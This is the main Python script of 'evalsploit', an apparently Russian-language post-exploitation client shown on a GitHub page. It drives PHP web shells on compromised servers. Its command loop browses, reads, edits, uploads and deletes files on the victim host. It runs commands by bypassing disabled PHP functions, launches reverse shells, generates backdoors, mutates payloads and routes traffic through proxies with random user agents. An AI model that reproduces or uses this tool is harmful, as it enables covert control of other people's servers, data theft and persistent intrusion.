-
Notifications
You must be signed in to change notification settings - Fork 1
/
main.py
308 lines (242 loc) · 11.4 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
import os
import random
import configparser
import modules.send as send
import modules.cd as chdr
import modules.copy as copy
import modules.ls as ls
import modules.delete as rm
import modules.cat as cat
import modules.download as dl
import modules.edit as edit
import modules.md as md
import modules.makefile as mf
import modules.upload as up
import modules.touch as tch
import modules.stat as stat
import modules.rename as rn
import modules.set as settings
import modules.proxy as proxy
import modules.generate as gen
import modules.mutation as mutate
import bypasses.trybypass as by
import bypasses.exec as run
import scan.sbd as sbd
import exploits.reverse as rs
import exploits.exploit as x
version = "2.7.3"
config = configparser.ConfigParser()
zed= config.read('settings.ini')
shell =config['SETTINGS']['shell']
read = config['SETTINGS']['read']
listdir = config['SETTINGS']['ls']
silent = config['SETTINGS']['silent']
reverse = config['SETTINGS']['reverse']
ts = config['SETTINGS']['send']
Zc = config['SETTINGS']['Z']
Vc = config['SETTINGS']['V']
a=[]
who = []
uagent = random.choice(open('useragents').read().splitlines())
print("Введите заражённый url для коннекта")
print("Или оставьте поле пустым, чтобы восстановить прошлую сессию")
test = input("URL@evalsploit~: ")
if test == "": url = config['SETTINGS']['url']
else:
config['SETTINGS']['url'] = test
with open('settings.ini', 'w') as configfile: config.write(configfile)
url = test
os.system('cls')
print("Введите прокси")
print("Или оставьте поле пустым, чтобы работать без них")
while 1:
proxys = input("PROXY@evalsploit~: ")
if proxys == "":
config['SETTINGS']['proxy'] = ""
with open('settings.ini', 'w') as configfile: config.write(configfile)
break
else:
f = proxy.test(proxys)
if f != "X":
config['SETTINGS']['proxy'] = proxys
with open('settings.ini', 'w') as configfile: config.write(configfile)
break
else: print('Прокси гавно')
os.system('cls')
#Серверинфо (мб не надо, потом доделаю)
#if silent != "1": serverip = send.send(url,"echo $_SERVER['SERVER_ADDR'].\":\".$_SERVER['SERVER_PORT'];",uagent)
#else: serverip = ""
def hi():
print(f'''
▄█ ▄█ █▀ ▄█
▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ██ ▄▄▄▄ ▄█ ▄▄▄ ██ ▄▄▄ ▄ ▄██▄
▄█▀▀▀▀█▌ ▀█▄ █▌ ▀▀ ▄██ ██ ▐██▀▀█▌ ███▀▀██ ██ ▄█▀▀██▄ ██ ██
██▀▀▀▀▀ ▀█▄██ ▄██▀██▌ ██ ▄ ▀█▄▄ ██ ▄██ ██ ██▄▀ ██ ██ ██
▀████▀ ▀██ ▀█▄▄██▀ █▀ ▀████▀ █████▀ █▀ ▀███▀ █▀ █▀
▄ ██ ▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ █▀ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
{version}
Средство скрытой эксплуатации
и байпаса отключенных функций
_________________________Локальные настройки клиента_________________________
Модули list: ls, dir
Модули cat: base64, html
Модули run: exec, passthru, system, shell_exec, popen, proc_open
Модуль тихого режима: 0,1 (выкл,вкл)
Опытные модули: expect_popen, pcntl_exec
Модули reverse-shell: monkey, ivan
Модули send: bypass, classic, simple
_______________________________Активные модули_______________________________
Модуль ls: {listdir}
Модуль cat: {read}
Модуль run: {shell}
Модуль reverse-shell: {reverse}
Модуль send: {ts}
________________________________Общие данные_________________________________
Рабочая область: {url}''')
hi()
if silent != "1":
execlist = by.cmd(url,uagent)
if execlist == ">":
print(" Произошла ошибка. Возможно, не тот модуль send")
print(" Или проблема с сервером. Крч я хз, сам решай")
print(" Потом фикс выкачу")
else:
pwd = send.send(url,"echo __DIR__;",uagent)
if pwd == "/tmp":
pwd = send.send(url,"echo getcwd();",uagent) # PWD
statpwd = pwd
print(f" Активная директория: {pwd}")
if execlist not in (""," "):
print(" Сервер поддерживает: "+execlist)
if shell not in execlist:
print(" Сервер не поддерживает "+shell)
who = execlist.split(',')
shell = random.choice(who)
print(" Установлен модуль ", shell)
else:
print(" Доступных для работы модулей на сервере нет")
else:
pwd = "/var/www/"
statpwd = pwd
print('''
Включен тихий режим")
Установлена домашняя директория по умолчанию: /var/www/")
Чтобы установить директорию воспользуйтесь командой home''')
print()
###_____ ОСНОВА _____###
while True:
#Пасом поставить footer с заменой символов на русские
cmd = input("[>] ")
arg = cmd.split(" ", 1)[0]
try: com = cmd.split(" ", 1)[1]
except: com = ""
match arg:
#============== LS ==============#
case "ls":
if listdir == "dir":
print(ls.dir(url,com,pwd,uagent))
if listdir == "ls":
print(ls.ls(url,com,pwd,uagent))
#============== CD ==============#
case "cd":
if com == "":
print(pwd)
else:
pwd = chdr.chdir(url,com,pwd,uagent)
#============= COPY =============#
case "cp":
if com != "":
copy.files(url,com,pwd,uagent)
#============ DELETE ============#
case "rm":
if com != "":
if rm.file(url,com,pwd,uagent) != "1":
print("Успешно удалено")
else:
print("Ошибка удаления")
#============== CAT ==============#
case "cat":
if com != "":
if read == "html":
cat.file(url,com,pwd,uagent)
if read == "base64":
cat.base(url,com,pwd,uagent)
#============== PWD ==============#
case "pwd":
print(pwd) #print(cd) Уверен? Я же записываю в pwd cd, легче брать активную переменную
#============ DOWNLOAD ============#
case "dl": #DownLoad
dl.file(url,com,pwd,uagent)
#============== EDIT ==============#
case "edit": #Придумать
fte,orname,path = edit.dl(url,com,pwd,uagent)
print("Отредактируйте файл и нажмите любую кнопку для его обновления на сервере")
os.system(fte)
os.system('pause>nul')
edit.ul(url,fte,orname,path,uagent)
os.remove(fte)
#=============== DIR ==============#
case "mkd": #dir
md.mkdir(url,pwd,com,uagent)
#============== FILE ==============#
case "mkf": #file
mf.mkfile(url,pwd,com,uagent)
#============= UPLOAD =============#
case "upl": #upload в PWD
up.upload(url,pwd,uagent)
#============== TOUCH ==============#
case "touch": #file
tch.time(url,pwd,com,uagent)
#=============== STAT ===============#
case "stat": #данные по файлу
stat.data(url,pwd,com,uagent)
#============== RENAME ==============#
case "ren": #Upload FROM_URL TO DIR
rn.obj(url,pwd,com,uagent)
#=============== EXEC ===============#
case "run": #Какой ужас. Придумать сессию
if shell == "exec": run.exec(url,uagent)
if shell == "shell_exec": run.shell_exec(url,uagent)
if shell == "system": run.system(url,uagent)
if shell == "passthru": run.passthru(url,uagent)
if shell == "popen": run.popen(url,uagent)
if shell == "proc_open": run.proc_open(url,uagent)
if shell == "expect_popen": run.expect_popen(url,uagent)
if shell == "pcntl_exec": run.pcntl_exec(url,uagent)
if shell == "do": run.do(url,uagent)
#============= SETTINGS =============#
case "set": #Пофиксить говнокод в модуле
shell,read,listdir,silent,reverse,ts = settings.sets(com)
#=============== HOME ===============#
case "home": #__DIR__
pwd = send.send(url,"echo __DIR__;",uagent)
#=============== SCAN ===============#
case "scan": #Рекурсив по директории
print("Начат процесс сканирования")
sbd.sbd(url,com,pwd,uagent)
#=============== INFO ===============#
case "info": #Доделать
print(send.send(url,"echo php_uname().\"\\n\".PHP_OS.\"\\n\".phpversion();",uagent))
#========== REVERSE-SHELL ===========#
case "reverse": #Реверс
print("Стартуем")
if reverse == "monkey": rs.shell(url,pwd,com,uagent)
if reverse == "ivan": rs.shell2(url,com,uagent)
#=============== GEN ===============#
case "gen":
gen.backdoor(ts,Zc,Vc)
#============= EXPLOIT =============#
case "exploit": #Крутая штука, привинтить к реверсу
x.steightone(url,com,uagent)
case "mutate":
mutate.mutate(url,uagent)
case "reset":
print("Ппц, нафиг эта функция нужна-то?")
config = configparser.ConfigParser()
config.read('settings.ini')
config['SETTINGS']['Z'] = "Z"
config['SETTINGS']['V'] = "V"
with open('settings.ini', 'w') as configfile: config.write(configfile)
case "help": hi()
case "exit": break #выход